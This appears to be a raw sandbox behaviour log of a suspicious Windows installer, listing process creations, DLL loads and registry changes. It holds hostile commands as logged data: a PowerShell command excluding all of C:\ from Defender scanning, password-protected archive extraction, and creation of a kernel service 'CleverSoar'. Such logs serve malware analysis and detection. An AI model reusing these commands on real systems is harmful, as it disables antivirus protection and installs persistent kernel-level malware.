Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20432,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20442,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\sc.exe sc start CleverSoar Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Window found: window name: TMainForm Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
